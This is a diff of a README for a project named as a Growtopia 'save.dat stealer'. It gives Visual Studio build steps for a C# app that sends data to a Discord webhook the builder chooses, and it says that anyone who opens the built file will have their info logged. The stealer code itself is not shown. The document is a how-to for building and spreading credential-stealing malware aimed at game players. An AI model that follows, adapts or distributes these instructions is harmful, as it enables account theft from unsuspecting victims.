TimeCova/simple-save.dat-stealer-growtopia/README.md

 Dependencies:
 CSharpDiscordWebhook.NET

-How to build file? \n
+How to build file?
-Open in Visual Studio ( Console App ) \n
+Open in Visual Studio ( Console App )
-Change the webhook url and anything else u need to change. \n Change Build to Release then click build \n
+Change the webhook url and anything else u need to change
+Change Build to Release then click build

 And your done!
 Anyone who opens the file will get their info logged.